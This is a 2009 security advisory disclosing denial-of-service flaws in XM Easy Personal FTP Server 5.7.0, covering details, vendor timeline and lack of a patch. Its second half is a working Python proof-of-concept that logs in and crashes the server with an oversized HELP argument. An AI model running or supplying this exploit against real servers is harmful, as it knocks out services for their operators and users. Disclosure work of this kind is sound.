XM Easy Personal FTP Server Multiple DoS vulnerabilities

Credits:
NeerajT of Nevis Labs
http://www.nevisnetworks.com/services.php?id=10 

Date of Discovery: 14-May-2009

Vendor: Dxmsoft
URL: http://www.dxm2008.com/ 

Affected:
XM Easy Personal FTP Server 5.7.0
Earlier versions may also be affected

Overview:
XM Easy Personal FTP Server is a easy use FTP server Application. Multiple Denial of service vulnerability exists in XM Personal FTP Server that causes the application to crash when a long list of arguments is sent to certain FTP commands post authentication.

Details:
The DoS vulnerability exists because the application fails to handle large parameter values sent to certain FTP commands like HELP or TYPE. When a long value ( > 4700 Bytes) is passed as a parameter to these commands, the FTP server cannot process it and it will crash. Note that this is a post authentication vulnerability, so user must be logged in to exploit the vulnerability. No registers are overwritten, hence remote code execution may not be possible.

Severity:
High

Solution:
No patches available from vendor
No workaround is available at this time

Vendor Communication Timelines:
05.14.2009 - Vulnerability Discovered
05.15.2009 - Vendor Notified
05.20.2009 - No Response, Vendor Notified again
06.05.2009 - No Ack from Vendor, Public Disclosure

PoC: Python Exploit
-----------------------------------------------------
#!/usr/bin/python
#
# ::::::::::::::::::::::::::::::[neeraj(.)thakar(at)nevisnetworks(.)com]
#
# [-] What:....[ XM Easy Personal FTP Server 5.7.0 ].....
# [-] Where:...[ http://www.dxm2008.com ]................ 
# [-] When:....[ 14-May-2009 ]...........................
# [-] Who:.....[ NeerajT | neeraj(.)thakar(at)nevisnetworks(.)com ]....
# [-] How:.....[
# A Denial of service vulnerability exists in XM
# Personal FTP Server that causes the application to
# crash when a long list of arguments is sent to
# certain FTP commands post authentication..........]
# [-] Thankz:..[ Jambalaya, Xin and Chintan ]............

import os
import sys
import time
from ftplib import FTP

def usage():
        print "[...XM Personal FTP Server 5.7.0 DoS Exploit...]"
        print "[.........neeraj(.)thakar(at)gmail(.)com..............]\n"
        print "Usage: ./XMPersonal_FTPServer_DoSPoC.py   \n"
        print "\n Use it at your own risk ! This is just a PoC. I am not responsible for damages done by your crazy thinking.. :P\n"

# The Main function starts here..
if __name__ == "__main__":
        ftpport = '21'

        # get the args..
        if len(sys.argv) < 3:
                usage()
                sys.exit(1)
        ftpserver = sys.argv[1]
        user = sys.argv[2]
        passwd = sys.argv[3]

        print "Connecting to "+ftpserver+" using "+user+"....",

        # Try opening a connection to the FTP server
        try:
                F = FTP(ftpserver)
                F.timeout = 3
                if F:
                        print 'Connected !'
        except:
                print "\nCould not connect to the Server :(\n"
                sys.exit(1)

        #Lets create the Buffer..
        crap = "A" * 5000

        # Creat'in da'bomb
        dabomb = 'HELP '+crap

        print "Press any key to login.."
        ch = sys.stdin.read(1)

        # Lets login
        try:
                F.login(user, passwd)
        except:
                print "Oops.. Looks like you forgot to create a login !!\n"
                F.quit()
                sys.exit(1)
        print "Target Locked, Press any key to fire..",
        ch = sys.stdin.read(1)

        print 'Sendin Da\'Bomb..'
        try:
                F.sendcmd(dabomb)
        except:
                print 'Target destroyed !! Mission successfull..!'

        print 'Returning to base..'
        F.close()
        sys.exit(0)
-----------------------------------------------------